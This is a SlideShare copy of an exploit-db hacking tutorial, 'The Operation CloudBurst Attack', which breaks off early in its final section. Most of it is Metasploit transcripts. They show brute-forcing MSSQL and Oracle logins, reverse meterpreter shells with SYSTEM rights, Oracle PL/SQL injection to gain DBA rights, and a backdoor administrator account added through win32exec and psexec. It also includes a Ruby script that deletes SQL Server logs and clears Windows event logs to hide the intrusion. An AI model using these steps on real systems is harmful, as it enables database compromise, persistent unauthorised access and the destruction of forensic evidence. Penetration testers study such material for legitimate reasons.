The Operation CloudBurst Attack

1,386 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,386
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
38
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

The Operation CloudBurst Attack

  1. 1. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/13621/ The Operation CloudBurst Attack |=--------------------------------------------------------------------=| |=---------------=[ The Operation CloudBurst Attack ]=----------------=| |=--------------------------=[ 18 Feb 2010 ]=-------------------------=| |=----------------------=[ By CWH Underground ]=--------------------=| |=--------------------------------------------------------------------=| ###### Info ###### Title : The Operation CouldBurst Attack Author : ZeQ3uL (Prathan Phongthiproek) Team : CWH Underground [http://www.exploit-db.com/author/CWH Underground] Website : cwh.citec.us / www.citec.us Date : 2010-02-18 ########## Contents ########## [0x00] - Introduction [0x01] - Get Root on MSSQL Database [0x01a] - Scanning & Enumeration [0x01b] - Gaining Access [0x01c] - Covering Track [0x02] - Get Root on Oracle Database [0x02a] - Scanning & Enumeration [0x02b] - Gaining Access [0x02c] - PL/SQL Injection - Elevate Priv [0x03] - Operation CloudBurst [0x04] - References [0x05] - Greetz To ####################### [0x00] - Introduction ####################### Hi all, in this paper, we will guide you about methods to hacking into Microsoft SQL, Oracle Database and latest Attack in Chapter "Operation Cloud we also show the ways to use the Best Exploitation tool, Metasploit Framework (Thank HD Moore and Rapid7) that powerful than day in the past with many expl We divide the paper into 6 sections from 0x00 to 0x05. However, only section 0x01 to 0x03 are technical issue. Section 0x01, we show the steps to h We recommend to read previous paper "The Art of Grey-Box Attack" that guide you about methods to hacking into Windows system, Linux system and Clie ##################################### [0x01] - Get Root on MSSQL Database ##################################### In this section, we talk about attacking MSSQL Database in network. We will start with scanning and enumeration MSSQL then we move to gain access system with SYSTEM Privilege in order to control the machine completely. ++++++++++++++++++++++++++++++++++ [0x01a] - Scanning & Enumeration ++++++++++++++++++++++++++++++++++ First, start with scanning by using Metasploit Framework with MSSQL Modules. Auxiliary ========= Name Rank Description ---- ---- ----------- admin/mssql/mssql_enum normal Microsoft SQL Server Configuration Enumerator admin/mssql/mssql_exec normal Microsoft SQL Server xp_cmdshell Command Execution admin/mssql/mssql_sql normal Microsoft SQL Server Generic Query scanner/mssql/mssql_login normal MSSQL Login Utility scanner/mssql/mssql_ping normal MSSQL Ping Utility Exploits ======== Name Rank Description ---- ---- ----------- windows/mssql/lyris_listmanager_weak_pass excellent Lyris ListManager MSDE Weak sa Password windows/mssql/ms02_039_slammer good Microsoft SQL Server Resolution Overflow windows/mssql/ms02_056_hello good Microsoft SQL Server Hello Overflow windows/mssql/ms09_004_sp_replwritetovarbin good Microsoft SQL Server sp_replwritetovarbin Memory Corruption windows/mssql/mssql_payload excellent Microsoft SQL Server Payload Execution The first example, We use mssql_loing to scan machine that used MSSQL database and try dictionary attack with our dict: [MSF Result]----------------------------------------------------------------------------------- msf > use scanner/mssql/mssql_login msf auxiliary(mssql_login) > show options Module options: Name Current Setting Required Description ---- --------------- -------- -----------1 of 12 12/24/10 5:52 PM
  2. 2. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/13621/ HEX2BINARY /opt/metasploit3/msf3/data/exploits/mssql/h2b no The path to the hex2binary script on the disk MSSQL_PASS no The password for the specified username MSSQL_PASS_FILE no A dictionary of passwords to perform a bruteforce attempt MSSQL_USER sa no The username to authenticate as RHOSTS yes The target address range or CIDR identifier RPORT 1433 yes The target port THREADS 1 yes The number of concurrent threads msf auxiliary(mssql_login) > set RHOSTS 192.168.163.0/24 RHOSTS => 192.168.163.0/24 msf auxiliary(mssql_login) > set MSSQL_PASS_FILE /pentest/passwords/wordlists/sqlpass.lst MSSQL_PASS_FILE => /pentest/passwords/wordlists/sqlpass.lst msf auxiliary(mssql_login) > run [*] 192.168.163.128:1433 successful logged in as sa with password [*] Scanned 1 of 3 hosts (100% complete) [*] Auxiliary module execution completed [End Result]------------------------------------------------------------------------------------ From result, we got successful logged with sa with blank password from 192.168.163.128 (Many admin use password, p@ssw0rd without quo [MSF Result]----------------------------------------------------------------------------------- msf > use admin/mssql/mssql_enum msf auxiliary(mssql_enum) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- HEX2BINARY /opt/metasploit3/msf3/data/exploits/mssql/h2b no The path to the hex2binary script on the disk MSSQL_PASS no The password for the specified username MSSQL_USER sa no The username to authenticate as RHOST yes The target address RPORT 1433 yes The target port msf auxiliary(mssql_enum) > set RHOST 192.168.163.128 RHOST => 192.168.163.128 msf auxiliary(mssql_enum) > run [*] Running MS SQL Server Enumeration... [*] Version: [*] Microsoft SQL Server 2000 - 8.00.194 (Intel X86) [*] Aug 6 2000 00:57:48 [*] Copyright (c) 1988-2000 Microsoft Corporation [*] Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 1) [*] Configuration Parameters: [*] C2 Audit Mode is Not Enabled [*] xp_cmdshell is Enabled [*] remote access is Enabled [*] allow updates is Not Enabled [*] Database Mail XPs is Enabled [*] Ole Automation Procedures is Enabled [*] Databases on the server: [*] Database name:master [*] Database Files for master: [*] C:Program FilesMicrosoft SQL ServerMSSQLdatamaster.mdf [*] C:Program FilesMicrosoft SQL ServerMSSQLdatamastlog.ldf [*] Database name:tempdb [*] Database Files for tempdb: [*] C:Program FilesMicrosoft SQL ServerMSSQLdatatempdb.mdf [*] C:Program FilesMicrosoft SQL ServerMSSQLdatatemplog.ldf [*] Database name:model [*] Database Files for model: [*] C:Program FilesMicrosoft SQL ServerMSSQLdatamodel.mdf [*] C:Program FilesMicrosoft SQL ServerMSSQLdatamodellog.ldf [*] Database name:msdb [*] Database Files for msdb: [*] C:Program FilesMicrosoft SQL ServerMSSQLdatamsdbdata.mdf [*] C:Program FilesMicrosoft SQL ServerMSSQLdatamsdblog.ldf [*] Database name:pubs [*] Database Files for pubs: [*] C:Program FilesMicrosoft SQL ServerMSSQLdatapubs.mdf [*] C:Program FilesMicrosoft SQL ServerMSSQLdatapubs_log.ldf [*] Database name:Northwind [*] Database Files for Northwind: [*] C:Program FilesMicrosoft SQL ServerMSSQLdatanorthwnd.mdf [*] C:Program FilesMicrosoft SQL ServerMSSQLdatanorthwnd.ldf [*] System Logins on this Server: [*] sa [*] BUILTINAdministrators [*] System Admin Logins on this Server: [*] BUILTINAdministrators [*] sa [*] Windows Logins on this Server: [*] No Windows logins found! [*] Windows Groups that can logins on this Server: [*] BUILTINAdministrators [*] Accounts with Username and Password being the same: [*] No Account with its password being the same as its username was found. [*] Accounts with empty password: [*] sa [*] Stored Procedures with Public Execute Permission found: [*] xp_getfiledetails [*] xp_dirtree [*] xp_fixeddrives [*] xp_cmdshell [*] xp_getnetname [*] xp_enum_activescriptengines [*] xp_fileexist [*] xp_ntsec_enumdomains [*] sp_getbindtoken [*] sp_createorphan [*] xp_unc_to_drive [*] sp_droporphans [*] xp_MSplatform2 of 12 12/24/10 5:52 PM
  3. 3. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/13621/ [*] sp_xml_preparedocument [*] sp_xml_removedocument [*] xp_IsNTAdmin [*] xp_MSnt2000 [*] xp_grantlogin [*] xp_revokelogin [*] xp_MSLocalSystem [*] sp_prepexec [*] sp_prepexecrpc [*] sp_unprepare [*] sp_reset_connection [*] sp_getschemalock [*] sp_releaseschemalock [*] sp_resyncprepare [*] sp_resyncexecute [*] sp_resyncexecutesql [*] sp_resyncuniquetable [*] sp_refreshview [*] sp_repldone [*] sp_repltrans [*] sp_replcounters [*] sp_replcmds [*] sp_replpostschema [*] sp_replincrementlsn [*] sp_replsetoriginator [*] sp_replsetsyncstatus [*] xp_mergexpusage [*] xp_showlineage [*] xp_updatelineage [*] xp_proxiedmetadata [*] xp_initcolvs [*] xp_updatecolvbm [*] xp_showcolv [*] xp_execresultset [*] xp_varbintohexstr [*] xp_intersectbitmaps [*] xp_displayparamstmt [*] xp_printstatements [*] sp_replsendtoqueue [*] sp_replwritetovarbin [*] xp_qv [*] xp_regread [*] Instances found on this server: [*] MSSQLSERVER [*] Default Server Instance SQL Server Service is running under the privilege of: [*] LocalSystem [*] Auxiliary module execution completed [End Result]------------------------------------------------------------------------------------ ++++++++++++++++++++++++++ [0x01b] - Gaining Access ++++++++++++++++++++++++++ Next step, We will get shell from target with MSSQLs stored procedure xp_cmdshell. It enabled by default on MSSQL2000 but in MSSQL2005,200 Re-Enable XP_CMDSHELL on MSSQL 2005/2008 - "exec master.dbo.sp_configure show advanced options,1;RECONFIGURE;exec master.dbo.sp_configure xp_cmd Re-Enable XP_CMDSHELL on MSSQL 2000 - "exec sp_addextendedproc xp_cmdshell,xp_log70.dll;exec sp_addextendedproc xp_cmdshell, C:Progra Rebuild XP_CMDSHELL if it was deleted - "CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS;DECLARE @result int, @OLEResult int, EXECUTE @OLEResult = sp_OACreate WScript.Shell, @ShellID OUT;IF @OLEResult <> 0 SELECT @result = @OLE (CreateObject %0X, 14, 1, @OLEResult);EXECUTE @OLEResult = sp_OAMethod @ShellID, Run, Null, @cmd, 0 @result = @OLEResult;IF @OLEResult <> 0 RAISERROR (Run %0X, 14, 1, @OLEResult);EXECUTE @OLEResult = s Now we use mssql_payload to spawn meterpreter shell that make me easy to compromise system [MSF Result]----------------------------------------------------------------------------------- msf > use windows/mssql/mssql_payload msf exploit(mssql_payload) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOST yes The target address RPORT 1433 yes The target port USERNAME sa no The username to authenticate as Exploit target: Id Name -- ---- 0 Automatic msf exploit(mssql_payload) > set RHOST 192.168.163.128 RHOST => 192.168.163.128 msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(mssql_payload) > set LHOST 192.168.163.2 LHOST => 192.168.163.2 msf exploit(mssql_payload) > exploit [*] Started reverse handler on port 4444 [*] Warning: This module will leave nPIsxDgn.exe in the SQL Server %TEMP% directory [*] Writing the debug.com loader to the disk... [*] Converting the debug script to an executable... [*] Uploading the payload, please be patient... [*] Converting the encoded payload... [*] Executing the payload... [*] Sending stage (725504 bytes) [*] Meterpreter session 1 opened (192.168.163.2:4444 -> 192.168.163.128:1050)3 of 12 12/24/10 5:52 PM
  4. 4. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/13621/ meterpreter > getuid Server username: NT AUTHORITYSYSTEM [End Result]------------------------------------------------------------------------------------ ++++++++++++++++++++++++++ [0x01c] - Covering Track ++++++++++++++++++++++++++ How about Log file ?? When we used meterpreter script to spawn shell, Windows Event viewer can keep our log activity. So I found nice scrip Mssqlclear.rb [Code]----------------------------------------------------------------------------------- #MSSQL LOG CLEAR BY ZERO COLD def list_exec(session,cmdlst) print_status("Running Command List ...") r= session.response_timeout=120 cmdlst.each do |cmd| begin print_status "running command #{cmd}" r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {Hidden => true, Channelized => true}) while(d = r.channel.read) print_status("#{d}") end r.channel.close r.close rescue ::Exception => e print_error("Error Running Command #{cmd}: #{e.class} #{e}") end end end commands = [Net STOP "SQL Server (SQLEXPRESS)" , del "%SystemDrive%Program FilesMicrosoft SQL ServerMSSQL.1MSSQLLOGERRORLOG.*", del "%SystemDrive%Program FilesMicrosoft SQL ServerMSSQL.1MSSQLLOGlog*.trc", Net START "SQL Server (SQLEXPRESS)"] def clrevtlgs(session) evtlogs = [ security, system, application, directory service, dns server, file replication service ] print_status("Clearing Event Logs, this will leave and event 517") begin evtlogs.each do |evl| print_status("Clearing the #{evl} Event Log") log = session.sys.eventlog.open(evl) log.clear end print_status("All Event Logs have been cleared") rescue ::Exception => e print_status("Error clearing Event Log: #{e.class} #{e}") end end list_exec(client,commands) clrevtlgs(client) [End Code]------------------------------------------------------------------------------------ Now we got mssqlclear.rb then place code into your metasploit scripts directory [Run Script]--------------------------------------------------------------------------------- meterpreter > run mssqlclear [*] Running Command List ... [*] running command Net STOP "SQL Server (SQLEXPRESS)" [*] The SQL Server (SQLEXPRESS) service is stopping. [*] The SQL Server (SQLEXPRESS) service was stopped successfully. [*] running command del "%SystemDrive%Program FilesMicrosoft SQL ServerMSSQL.1MSSQLLOGERRORLOG.*" [*] running command del "%SystemDrive%Program FilesMicrosoft SQL ServerMSSQL.1MSSQLLOGlog*.trc" [*] running command Net START "SQL Server (SQLEXPRESS)" [*] The SQL Server (SQLEXPRESS) service is starting. [*] The SQL Server (SQLEXPRESS) service was started successfully. [*] Clearing Event Logs, this will leave and event 517 [*] Clearing the security Event Log [*] Clearing the system Event Log [*] Clearing the application Event Log [*] Clearing the directory service Event Log [*] Clearing the dns server Event Log [*] Clearing the file replication service Event Log[*] All Event Logs have been cleared meterpreter > [End Run]------------------------------------------------------------------------------------ ###################################### [0x02] - Get Root on Oracle Database ###################################### ++++++++++++++++++++++++++++++++++4 of 12 12/24/10 5:52 PM
  5. 5. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/13621/ [0x02a] - Scanning & Enumeration ++++++++++++++++++++++++++++++++++ First, start with scanning by using Metasploit Framework with Oracle Modules. Auxiliary ========= Name Rank Description ---- ---- ----------- admin/oracle/droptable_trigger normal SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger. admin/oracle/login_brute normal Oracle Account Discovery. admin/oracle/ora_ntlm_stealer normal Oracle SMB Relay Code Execution admin/oracle/oracle_sql normal Oracle SQL Generic Query admin/oracle/oraenum normal Oracle Database Enumeration admin/oracle/osb_execqr normal Oracle Secure Backup exec_qr() Command Injection Vulnerability admin/oracle/osb_execqr2 normal Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability admin/oracle/post_exploitation/win32exec normal Oracle Java execCommand (Win32) admin/oracle/post_exploitation/win32upload normal Oracle URL Download admin/oracle/sid_brute normal ORACLE SID Brute Forcer. admin/oracle/tnscmd normal TNSLsnr Command Issuer scanner/oracle/emc_sid normal Oracle Enterprise Manager Control SID Discovery scanner/oracle/sid_enum normal SID Enumeration. scanner/oracle/spy_sid normal Oracle Application Server Spy Servlet SID Enumeration. scanner/oracle/tnslsnr_version normal Oracle tnslsnr Service Version Query. scanner/oracle/xdb_sid normal Oracle XML DB SID Discovery sqli/oracle/dbms_cdc_ipublish normal SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE sqli/oracle/dbms_cdc_publish normal SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE sqli/oracle/dbms_defer_sys normal SQL Injection via SYS.DBMS_DEFER_SYS sqli/oracle/dbms_export_extension normal SQL Injection via DBMS_EXPORT_EXTENSION sqli/oracle/dbms_metadata_get_granted_xml normal SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML. sqli/oracle/dbms_metadata_get_xml normal SQL Injection via SYS.DBMS_METADATA.GET_XML. sqli/oracle/dbms_metadata_open normal SQL Injection via SYS.DBMS_METADATA.OPEN. sqli/oracle/lt_compressworkspace normal SQL Injection via SYS.LT.COMPRESSWORKSPACE. sqli/oracle/lt_findricset_cursor normal SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method sqli/oracle/lt_mergeworkspace normal SQL Injection via SYS.LT.MERGEWORKSPACE. sqli/oracle/lt_removeworkspace normal SQL Injection via SYS.LT.REMOVEWORKSPACE. sqli/oracle/lt_rollbackworkspace normal SQL Injection via SYS.LT.ROLLBACKWORKSPACE. Exploits ======== Name Rank Description ---- ---- ----------- windows/browser/oracle_dc_submittoexpress normal Oracle Document Capture 10g ActiveX Control Buffer Overflow windows/ftp/oracle9i_xdb_ftp_pass great Oracle 9i XDB FTP PASS Overflow (win32) windows/ftp/oracle9i_xdb_ftp_unlock great Oracle 9i XDB FTP UNLOCK Overflow (win32) windows/http/oracle9i_xdb_pass great Oracle 9i XDB HTTP PASS Overflow (win32) windows/oracle/osb_ndmp_auth good Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow windows/oracle/tns_arguments good Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow. windows/oracle/tns_service_name good Oracle TNS Listener SERVICE_NAME Buffer Overflow. Next, We must find machine that use Oracle DB (Default port=1521) with scanner/oracle/tnslsnr_version. [MSF Result]---------------------------------------------------------------------------- msf > use scanner/oracle/tnslsnr_version msf auxiliary(tnslsnr_version) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 1521 yes The target port THREADS 1 yes The number of concurrent threads msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.163.0/24 RHOSTS => 192.168.163.0/24 msf auxiliary(tnslsnr_version) > run [*] Scanned 026 of 256 hosts (010% complete) [*] Scanned 052 of 256 hosts (020% complete) [*] Scanned 077 of 256 hosts (030% complete) [*] Scanned 103 of 256 hosts (040% complete) [*] Scanned 128 of 256 hosts (050% complete) [*] Host 192.168.163.140 is running: 32-bit Windows: Version 9.2.0.1.0 - Production [*] Scanned 154 of 256 hosts (060% complete) [*] Scanned 180 of 256 hosts (070% complete) [*] Scanned 205 of 256 hosts (080% complete) [*] Scanned 231 of 256 hosts (090% complete) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed [End Result]---------------------------------------------------------------------------- Next step, Find SID instance (Service Name) on 192.168.163.140. Oracle 9i can enumerate SID with TNS_listener (No password) or use tns_cmd [MSF Result]---------------------------------------------------------------------------- msf auxiliary(tnslsnr_version) > use scanner/oracle/sid_enum msf auxiliary(sid_enum) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 1521 yes The target port THREADS 1 yes The number of concurrent threads msf auxiliary(sid_enum) > set RHOSTS 192.168.163.140 RHOSTS => 192.168.163.140 msf auxiliary(sid_enum) > run5 of 12 12/24/10 5:52 PM
  6. 6. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/13621/ [*] Identified SID for 192.168.163.140: RD [*] Identified SERVICE_NAME for 192.168.163.140: RD.ORA [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(sid_enum) > [End Result]---------------------------------------------------------------------------- Its seem we lucky to found SERVICE_NAME=RD.ORA, If sid_enum not work, You can use admin/oracle/sid_brute to find SID. Next step, Make admin/oracle/tnscmd [MSF Result]---------------------------------------------------------------------------- msf auxiliary(sid_enum) > use admin/oracle/tnscmd msf auxiliary(tnscmd) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- CMD (CONNECT_DATA=(COMMAND=VERSION)) no Something like ping, version, status, etc.. RHOST yes The target address RPORT 1521 yes The target port msf auxiliary(tnscmd) > set RHOST 192.168.163.140 RHOST => 192.168.163.140 msf auxiliary(tnscmd) > set CMD (CONNECT_DATA=(COMMAND=STATUS)) CMD => (CONNECT_DATA=(COMMAND=STATUS)) msf auxiliary(tnscmd) > run sending (CONNECT_DATA=(COMMAND=status)) to 192.168.163.140:1521 writing 89 bytes reading . .......6.........S. ...........]........(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER) (SECURITY=OFF)(VERSION=TNSLSNR for 32-bit Windows: Version 9.2.0.1.0 - Production)(START_DATE=13-11TB-200809:50:24)(SIDNUM=1)(LOGFILE=e:oracleora (PRMFILE=e:oracleora92networkadminlistener.ora)(TRACING=off)(UPTIME=32233167)(SNMP=OFF)(PID=1580)) .5........(ENDPOINT=(HANDLER=(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0) (HANDLER_ID=05ABD43D6CF4-438B-A1A1-14FC7801D431)(PRE=any)(SESSION=NS)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp) (HOST=abc.com)(PORT=1521))))),,(ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0) (ESTABLISHED=0)(REFUSED=0)(HANDLER_ID=A06894A90C64-4555-A915-FC8798AA2A9B)(PRE=http)(SESSION=RAW) (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=abc.com)(PORT=8080))(Presentation=HTTP)(Session=RAW)))),, (ENDPOINT=(HANDLER=(STA=ready)(HANDLER_MAXLOAD=0)(HANDLER_LOAD=0)(ESTABLISHED=0)(REFUSED=0) (HANDLER_ID=A0BB13DB2389-431A-80F2-D896C275A179)(PRE=FTP)(SESSION=RAW)(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp) (HOST=abc.com)(PORT=2100))(Presentation=FTP)(Session=RAW)))),,(SERVICE=(SERVICE_NAME=RD.ORA) (INSTANCE=(INSTANCE_NAME=RD)(NUM=2)(NUMREL=1))),,(SERVICE=(SERVICE_NAME=RD.ORA) (INSTANCE=(INSTANCE_NAME=RD)(NUM=2)(NUMREL=1))),,.........@ [End Result]---------------------------------------------------------------------------- ++++++++++++++++++++++++++ [0x02b] - Gaining Access ++++++++++++++++++++++++++ Now We got real SID is RD.ORA, Next step use admin/oracle/login_brute to brute-force weak username and password such as SYSTEM/MANAGER, DBSNMP/DBSNMP, SCOTT/TIGER Then Connect to Oracle database and query command with admin/oracle/oracle_sql For example we use SCOTT/TIGET that default username/password. [MSF Result]---------------------------------------------------------------------------- msf auxiliary(tnscmd) > use admin/oracle/login_brute msf auxiliary(login_brute) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- CSVFILE /opt/metasploit3/msf3/data/wordlists/oracle_default_passwords.csv no The file that contains a list of default accounts. RHOST yes The Oracle host. RPORT 1521 yes The TNS port. SID ORCL yes The sid to authenticate with. msf auxiliary(login_brute) > set RHOST 192.168.163.140 RHOST => 192.168.163.140 msf auxiliary(login_brute) > set SID RD.ORA SID => RD.ORA msf auxiliary(login_brute) > run [*] Found user/pass of: DBSNMP/DBSNMP... [*] Found user/pass of: SCOTT/TIGER... [*] Auxiliary module execution completed msf auxiliary(login_brute) > use admin/oracle/oracle_sql msf auxiliary(oracle_sql) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- DBPASS TIGER yes The password to authenticate with. DBUSER SCOTT yes The username to authenticate with. RHOST yes The Oracle host. RPORT 1521 yes The TNS port. SID ORCL yes The sid to authenticate with. SQL select * from v$version no The SQL to execute. msf auxiliary(oracle_sql) > set RHOST 192.168.163.140 RHOST => 192.168.163.140 msf auxiliary(oracle_sql) > set SID RD.ORA SID => RD.ORA msf auxiliary(oracle_sql) > run [*] Sending SQL... [*] Oracle9i Enterprise Edition Release 9.2.0.1.0 - Production [*] PL/SQL Release 9.2.0.1.0 - Production [*] CORE 9.2.0.1.0 Production6 of 12 12/24/10 5:52 PM
  7. 7. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/13621/ [*] TNS for 32-bit Windows: Version 9.2.0.1.0 - Production [*] NLSRTL Version 9.2.0.1.0 - Production [*] Done... [*] Auxiliary module execution completed msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs" SQL => select * from user_role_privs msf auxiliary(oracle_sql) > run [*] Sending SQL... [*] SCOTT,CONNECT,NO,YES,NO [*] SCOTT,RESOURCE,NO,YES,NO [*] Done... [*] Auxiliary module execution completed [End Result]---------------------------------------------------------------------------- +++++++++++++++++++++++++++++++++++++++++++ [0x02c] - PL/SQL Injection - Elevate Priv +++++++++++++++++++++++++++++++++++++++++++ We can query with SCOTT Priv but we want more priv like god (root). With PL/SQL Injection, we can potentially elevate their level of priv f DBA-level priv. In Metasploit have module for SQLi Oracle: Auxiliary ========= Name Rank Description ---- ---- ----------- sqli/oracle/dbms_cdc_ipublish normal SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE sqli/oracle/dbms_cdc_publish normal SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE sqli/oracle/dbms_defer_sys normal SQL Injection via SYS.DBMS_DEFER_SYS sqli/oracle/dbms_metadata_get_granted_xml normal SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML. sqli/oracle/dbms_metadata_get_xml normal SQL Injection via SYS.DBMS_METADATA.GET_XML. sqli/oracle/dbms_metadata_open normal SQL Injection via SYS.DBMS_METADATA.OPEN. sqli/oracle/dbms_export_extension normal SQL Injection via DBMS_EXPORT_EXTENSION sqli/oracle/lt_compressworkspace normal SQL Injection via SYS.LT.COMPRESSWORKSPACE. sqli/oracle/lt_findricset_cursor normal SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method sqli/oracle/lt_mergeworkspace normal SQL Injection via SYS.LT.MERGEWORKSPACE. sqli/oracle/lt_removeworkspace normal SQL Injection via SYS.LT.REMOVEWORKSPACE. sqli/oracle/lt_rollbackworkspace normal SQL Injection via SYS.LT.ROLLBACKWORKSPACE. Its time to elevate SCOTT priv to DBA priv with SQLi DBMS_EXPORT_EXTENSION [MSF Result]---------------------------------------------------------------------------- msf > use sqli/oracle/dbms_export_extension msf auxiliary(dbms_export_extension) > set RHOST 192.168.163.140 RHOST => 192.168.163.140 msf auxiliary(dbms_export_extension) > set SID RD.ORA SID => RD.ORA msf auxiliary(dbms_export_extension) > run [*] Sending package... [*] Done... [*] Sending body... [*] Done... [*] Sending declare... [*] Done... [*] Auxiliary module execution completed msf auxiliary(dbms_export_extension) > use admin/oracle/oracle_sql msf auxiliary(oracle_sql) > set RHOST 192.168.163.140 RHOST => 192.168.163.140 msf auxiliary(oracle_sql) > set SID RD.ORA SID => RD.ORA msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs" SQL => select * from user_role_privs msf auxiliary(oracle_sql) > run [*] Sending SQL... [*] SCOTT,CONNECT,NO,YES,NO [*] SCOTT,DBA,NO,YES,NO [*] SCOTT,RESOURCE,NO,YES,NO [*] Done... [*] Auxiliary module execution completed [End Result]---------------------------------------------------------------------------- W00T W00T !!, Now SCOTT has DBA Priv. Happy Time to Spawn shell with Java but first we must grant javasys priv to SCOTT. [MSF Result]---------------------------------------------------------------------------- msf auxiliary(oracle_sql) > set SQL "grant javasyspriv to SCOTT" SQL => grant javasyspriv to SCOTT msf auxiliary(oracle_sql) > run [*] Sending SQL... [*] Done... [*] Auxiliary module execution completed msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs" SQL => select * from user_role_privs msf auxiliary(oracle_sql) > run [*] Sending SQL... [*] SCOTT,CONNECT,NO,YES,NO [*] SCOTT,DBA,NO,YES,NO [*] SCOTT,JAVASYSPRIV,NO,YES,NO [*] SCOTT,RESOURCE,NO,YES,NO [*] Done... [*] Auxiliary module execution completed [End Result]----------------------------------------------------------------------------7 of 12 12/24/10 5:52 PM
  8. 8. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/13621/ Use admin/oracle/post_exploitation/win32exec to send command execution on victim system. [MSF Result]---------------------------------------------------------------------------- msf > use admin/oracle/post_exploitation/win32exec msf auxiliary(win32exec) > set CMD "net user zeq3ul 5plus4=10 /add && net localgroup administrators zeq3ul /add" CMD => net user zeq3ul 5plus4=10 /add && net localgroup administrators zeq3ul /add msf auxiliary(oracle_win32) > set SID RD.ORA SID => RD.ORA msf auxiliary(oracle_win32) > set RHOST 192.168.163.140 RHOST => 192.168.163.140 msf auxiliary(oracle_win32) > run [*] Creating MSF JAVA class... [*] Done... [*] Creating MSF procedure... [*] Done... [*] Sending command: net user zeq3ul 5plus4=10 /add && net localgroup administrators zeq3ul /add [*] Done... [*] Auxiliary module execution completed [End Result]---------------------------------------------------------------------------- Next step to full compromise system with PSEXEC and METERPRETER Payload [MSF Result]---------------------------------------------------------------------------- msf > use windows/smb/psexec msf exploit(psexec) > set RHOST 192.168.163.140 RHOST => 192.168.163.140 msf exploit(psexec) > set SMBUser zeq3ul SMBUser => zeq3ul msf exploit(psexec) > set SMBPass 5plus4=10 SMBPass => 5plus4=10 msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(psexec) > set LHOST 192.168.163.137 LHOST => 192.168.163.137 msf exploit(psexec) > exploit [*] Connecting to the server... [*] Started reverse handler on port 4444 [*] Authenticating as user zeq3ul... [*] Uploading payload... [*] Created mFfFcDAj.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.163.140[svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.163.140[svcctl] ... [*] Obtaining a service manager handle... [*] Creating a new service (mPJJxvtC - "MHMAPTlybviISxdBueIVtLYOTcL")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Deleting mFfFcDAj.exe... [*] Sending stage (723456 bytes) [*] Meterpreter session 1 opened (192.168.163.137:4444 -> 192.168.163.140:1633) meterpreter > getuid Server username: NT AUTHORITYSYSTEM [End Result]---------------------------------------------------------------------------- ############################### [0x03] - Operation CloudBurst ############################### Metasploit is a tool for exploiting system and software vulnerabilities.A new day has come with new software vulnerabilities such as "Opera New Trend for attack is Attack Layer 8 - Client Side Exploit. So This chapter we will point to attack "From Slave to God" that start with C << KiTrap0D >> Exploit for All Windows versions, Local Ring0 Kernel Exploit All 32bit x86 versions of Windows NT released since 27-Jul-1993 are believed to be affected, including but not limited to the following actively supported versions: - Windows 2000 - Windows XP - Windows Server 2003 - Windows Vista - Windows Server 2008 - Windows 7 - etc. Kitrap0D were combine into Metasploit Framework Meterpreter ;) You must SVN update metasploit to the latest exploit too for get it. This Operation, we send 